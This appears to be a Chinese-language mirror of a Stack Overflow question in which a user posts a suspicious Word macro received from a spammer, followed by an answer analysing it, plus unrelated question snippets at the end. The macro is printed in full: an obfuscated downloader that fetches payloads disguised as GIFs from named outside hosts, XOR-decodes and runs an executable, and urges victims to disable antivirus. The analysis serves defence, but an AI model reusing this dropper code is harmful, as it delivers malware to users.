个人中心
文章发布
退出
作者热门文章
- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
28
4
让堆栈溢出发布此问题的示例上下文。
我想他在这里尝试将其在 mac 和 windows 上的工作结合起来。
#If VBA7 And Win64 Then
Private Declare PtrSafe Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong
Private Declare PtrSafe Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare PtrSafe Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare PtrSafe Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long
Private Declare Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
这个攻击者似乎打开了这个文档。
Sub Document_Open()
Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid() As Byte
#If Win64 Then
Dim kmvbf As LongLong
#Else
Dim kmvbf As Long
#End If
这是在做什么?
ActiveDocument.Content.Delete
ActiveDocument.PageSetup.LeftMargin = 240
ActiveDocument.PageSetup.TopMargin = 100
Set myRange = ActiveDocument.Content
With myRange.Font
.Name = "Verdana"
.Size = 14
End With
ActiveDocument.Range.Text = "Check SSL certificate." & vbLf & " Please wait..."
这会损坏我的电脑吗?
DoEvents
DoEvents
DoEvents
DoEvents
wyqud = lwyfu
zdwie = Gshwjf(0, "http://adenzia.ch/_vti_cnf/bug.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)
If zdwie <> 0 And rufhd < 152143 Then
zdwie = Gshwjf(0, "http://kingofstreets.de/class/meq.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)
End If
If rufhd < 154743 Then
ActiveDocument.Content.Delete
MsgBox "No internet access. Turn off any firewall or anti-virus software and try again.", vbCritical, "Error"
Exit Sub
End If
bldos = FreeFile
Open wyqud For Binary As #bldos
ReDim mufid(0 To LOF(bldos) - 1)
Get #bldos, , mufid()
Close #bldos
Call duwif(mufid())
不知道这是在做什么
wyqud = Left(wyqud, Len(wyqud) - 3)
wyqud = wyqud & "exe"
bldos = FreeFile
Open wyqud For Binary As #bldos
Put #bldos, , mufid()
Close #bldos
kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)
ActiveDocument.Content.Delete
MsgBox "The file is corrupted and cannot be opened", vbCritical, "Error"
End Sub
巧妙地编写了不可读的代码。
Public Function lwyfu() As String
Dim djfie As String * 512
Dim pwifu As String * 576
Dim dwuf As Long
Dim wefkg As String
dwuf = Uhdwuud(512, djfie)
If (dwuf > 0 And dwuf < 512) Then
dwuf = Uhduiuwd(djfie, 0, 0, pwifu)
If dwuf <> 0 Then
wefkg = Left$(pwifu, InStr(pwifu, vbNullChar) - 1)
End If
lwyfu = wefkg
End If
End Function
另一个函数
Public Sub duwif(mufid() As Byte)
Dim dfety As Long
Dim bvjwi As Long
Dim wbdys As Long
Dim dvywi(256) As Byte
Dim wdals As Long
Dim dwiqh As Long
bvjwi = UBound(mufid) + 1
For dfety = 10 To 265
dvywi(dfety - 10) = mufid(dfety)
Next
wdals = UBound(dvywi) + 1
dwiqh = 0
For dfety = 266 To (bvjwi - 267)
mufid(dfety - 266) = mufid(dfety) Xor dvywi(dwiqh)
dwiqh = dwiqh + 1
If dwiqh = (wdals - 1) Then
dwiqh = 0
End If
Next
ReDim Preserve mufid(bvjwi - 267)
End Sub
宏结束
最佳答案
评论正确;宏下载恶意软件/ spy 软件并执行它。
它会尝试两个 GIF URL(如果下载失败,甚至会提示用户禁用他们的防火墙/AV)。这两个 GIF 是相同的(相同的 SHA256 校验和),它们有适当的 GIF header block (“GIF89a”),它们甚至有一些字节描述图像数据应该。
该宏使用 duwif() 子例程(第 105 行)从下载的 GIF 中提取可执行二进制文件。它将二进制文件存储在一个临时文件中,该文件的引用由 lwyfu() 函数(第 90 行)创建。
宏然后在第 82 行执行二进制文件:
kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)
您可以修改宏以删除/注释执行语句并插入无害的内容。例如:
REM kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)
MsgBox wyqud
这会打开一个消息框,其中包含提取的二进制文件的路径,而不是执行它。
二进制校验和为(SHA256)
55f4cc0f9258efc270aa5e6a3b7acde29962fe64b40c2eb36ef08a7a1369a5bd
一些防病毒提供商将此文件标记为恶意软件,并且自动分析显示了一些可疑行为。
关于vba - 垃圾邮件发送者/攻击者/坏人发送了包含大宏的 MS Word 文档。有人能理解这个宏的作用吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/43054472/
28
4
0
我是iOS的新手,我想更新ViewDidLoad()函数中的文本。 这是我的按钮功能,单击按钮时会发生动画,并将值“1”添加到“resultText.text” - (IBAction)oneB
做了什么 我有一个名为 MyUser 的自定义 User 模型,如 full example for an custom user model 中所述。在文档和一个所谓的 UserProfile 上,
我有一个 NSMenu(应用程序停靠菜单),其中有几个具有相同操作的项目。 如何找出发件人项目(触发操作的项目)在其容器菜单中的索引? (我对标题不感兴趣,因为它可能是重复的) 这就是我尝试过的,但它
我正在开发一个带有 NSTableView 的 macOS 应用程序,我希望能够在用户选择一行时使用 Cmd+C 快捷键复制单元格的内容。我已经实现了该方法 copy(sender: AnyObjec
我一直在使用 MVVM 的 RelayCommand 成功地将操作绑定(bind)到 XAML,但是我的 ItemsControl 有一个小问题。
我的 C# Winform 面板中有一堆文本框。每行文本框的命名如下: tb1 tbNickName1 comboBox1 tb2 tbNickName2 comboBox2 tb3 tbNickNa
我有一个IBAction,例如: - (IBAction)thisThing:(id)sender { [self doSomething]; } 我想这样做(手动调用 IBAction): [s
我知道如何通过 zeromq 将字符串消息从 C++ 发送到 Python。 这是我知道的发送字符串消息的代码: C++ 发件人代码: void *context = zmq_ctx_new(); v
我是一名优秀的程序员,十分优秀!